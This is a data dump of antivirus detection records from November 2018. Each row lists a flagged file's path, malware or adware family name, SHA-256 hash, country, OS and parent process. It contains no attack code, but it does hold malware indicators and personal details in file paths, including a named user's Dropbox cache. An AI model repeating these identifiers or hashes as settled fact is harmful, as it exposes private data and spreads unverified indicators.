  Row(detection=Row(filename='avscan-20181101-104144-73672e8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b09e9dda\\AVSCAN-20181101-103625-4BEDE389\\AVSCAN-20181101-104144-73672E8B', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185819-2a0d046b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc28c19b\\AVSCAN-20181101-185758-276AD2CD\\AVSCAN-20181101-185819-2A0D046B', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:58:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:38:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pokemon h  dx9.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.515\\Hand v9\\Pokemon H  DX9.exe', filesize=5568000, name='W32/Virut.Gen.#M1.#R1'), hash='cbdf4b1a48886bd5b0bca51b1caa8461d6030bc1aec02d9bfd5e52532105ef05', metadata=Row(cmdline='\\\\\\/MONITOR', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=7347928, timestamp='2018-11-01T00:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152403-4d5605a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152403-4D5605A6', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='video.exe', filepath='E:\\school\\Local\\utq\\การงานเทคโน\\video2\\video\\video.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='882908ebed229ab755cc69210a7b40c89c9d287ed6bcca05ff8b0143a2873383', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsd41FA.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='TZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T13:55:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a81da2ce40ec01a398135c85f489ca1d7077098acd35b6d695968753c1601e38.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-13.available\\Avira\\A81DA2CE40EC01A398135C85F489CA1D7077098ACD35B6D695968753C1601E38.VIR', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a81da2ce40ec01a398135c85f489ca1d7077098acd35b6d695968753c1601e38', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:57:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:56:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ex allievi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\ex allievi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094334-f481b2cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094334-F481B2CC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175335-827fe375', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_69123d72\\AVSCAN-20181101-175316-7F43BA19\\AVSCAN-20181101-175335-827FE375', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:54:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212306-e7ca2286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212306-E7CA2286', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150702-dd361364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150702-DD361364', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:07:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dc62081b2da0414c8aa90dcc7a47171781ca46a9b30c1c9241711453a65e6a79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DC62081B2DA0414C8AA90DCC7A47171781CA46A9B30C1C9241711453A65E6A79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dc62081b2da0414c8aa90dcc7a47171781ca46a9b30c1c9241711453a65e6a79', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:05:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194624-47b1cbfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194624-47B1CBFA', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152939-e14e25e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152939-E14E25E3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='disegnatore meccanico cad-cam.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\MECCANICA\\DISEGNATORE MECCANICO CAD-CAM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T15:16:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SmartCloudInput\\1.2.6.0329\\MiNiPure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rischi 812008.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\SLIDES VECCHIE\\rischi 812008.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152147-86f119f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152147-86F119F2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084031-dace0fe2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d0668ed1\\AVSCAN-20181101-083653-BED02090\\AVSCAN-20181101-084031-DACE0FE2', filesize=4640000, name='TR/Patched.Gen.#M1.#R1'), hash='ea6dc24d16836cc4f8aab54386da351f2af1317f0dbac8552cf3e5d530a14e88', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:41:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='H:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\uTorrent\\updates\\3.4.9_42973\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='a431e474429af10bd3726137080ffb5c32bcad99c32f263978eac8ca66017b0b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lja7shayne10.exe', filepath='\\\\?\\C:\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-196852800\\lja7shayne10.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='a321509a123eb7b810e5be54fa769810ef4851d411ebefcebc5e351e0a75d7ef', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:05:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:25:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tib6bd.tmp', filepath='\\\\?\\F:\\Users\\X\\AppData\\Local\\Temp\\TIB6BD.tmp', filesize=576000, name='HEUR/AGEN.1004080.#M1.#R1'), hash='0c1a8741aaf608a74c6daa27bc76348fcd8244abf315c984c555845b9253c842', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-04T22:57:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6553239\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-04T20:14:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150333-36505a83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e20eca3\\AVSCAN-20181104-150039-241ADA85\\AVSCAN-20181104-150333-36505A83', filesize=1088000, name='ADWARE/Wajam.Gen.#M1.#R1'), hash='2bb098f248db6748e04f8f61c844bf4986019c3a9726cc7db7f4431e1df93aac', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pdf2word.exe', filepath='C:\\Program Files (x86)\\FM Software Studio\\Free PDF To Word Converter\\PDF2Word.exe', filesize=1024000, name='W32/Infector.Gen8.#M300.#R700734'), hash='36734b21b88ed67e118d537af9c9f6b1df8a30af7ffc23dd33a15a66437af994', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\alg.exe', parentsize=None, timestamp='2018-11-04T05:47:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182504-121773a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-182504-121773A6', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe299_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe299 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T20:27:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silentpatchsa.asi', filepath='C:\\Program Files (x86)\\Rockstar Games\\Grand Theft Auto\\GTA\\SilentPatchSA.asi', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='36706adf4832b5785a472241af4bad550aa715084826a596ca8462755f0cd3a2', metadata=Row(cmdline='-c -n NxTzO_WarninG -h 198.50.206.176 -p 7777', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Rockstar Games\\Grand Theft Auto\\GTA\\gta_sa.exe', parentsize=14383616, timestamp='2018-11-04T15:48:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-222035-15f4fe6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_955439b8\\AVSCAN-20181103-221754-016A502D\\AVSCAN-20181103-222035-15F4FE6F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='new folder .exe', filepath='F:\\New Folder .exe', filesize=2048000, name='TR/Patched.Ren.Gen.#M300.#R1795'), hash='a59cb334880b9f3106271c4b9270cea6241db2c975891040bb915cdbcd724fce', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T04:11:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msmpeg2vdec.dll', filepath='C:\\Windows\\System32\\msmpeg2vdec.dll', filesize=1572000, name='HEUR/AGEN.1031535.#M1.#R1'), hash='516e486c47505be9dcbe9ca75f92e4c8912e61e1fb296b1a7d6d260c5fa92d6c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:15:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='trz97bd.tmp', filepath='\\\\?\\C:\\Applications\\trz97BD.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:46:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sandboxie crack (64bit).exe', filepath='N:\\SOFTWARE\\DOWNLOADED\\Sandboxie 506 x86 & x64 Bit Nederlands\\Sandboxie 5.06 x86 & x64 Bit Nederlands\\Crack(64bit)\\Sandboxie Crack (64bit).exe', filesize=1024000, name='TR/Crypt.XPACK.Gen.#M300.#R3949'), hash='4662864eb7a400898bc6d69762d58d513acd5942dd9edbaad32464966e7d0f23', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Copy Handler\\ch64.exe', parentsize=1836264, timestamp='2018-11-04T17:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='№19 свод высшая-табл (1) жанпейсова.exe', filepath='f:\\файлы скрыты трояном\\аттестау\\№19 СВОД ВЫСШАЯ-табл (1) Жанпейсова.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4a5cdb30da6c844d6ed5ddb56734fbe843c523e817ff21c146c53d9a81e93133', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:31:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195832-10f96da3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195832-10F96DA3', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0349465.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0349465.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:07:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133439-5bc14a6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4001d2c\\AVSCAN-20181104-130150-24F8450F\\AVSCAN-20181104-133439-5BC14A6E', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='1e31c57f88ddca035cf67e202b35d38ba7934cd01dcc5cea034f16a05fe69665', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:34:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024457', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024457', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075147-686a0bd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24dc9eb5\\AVSCAN-20181104-074808-392E2EED\\AVSCAN-20181104-075147-686A0BD2', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:51:52Z'), dt=datetime.date(2018, 11, 4)),
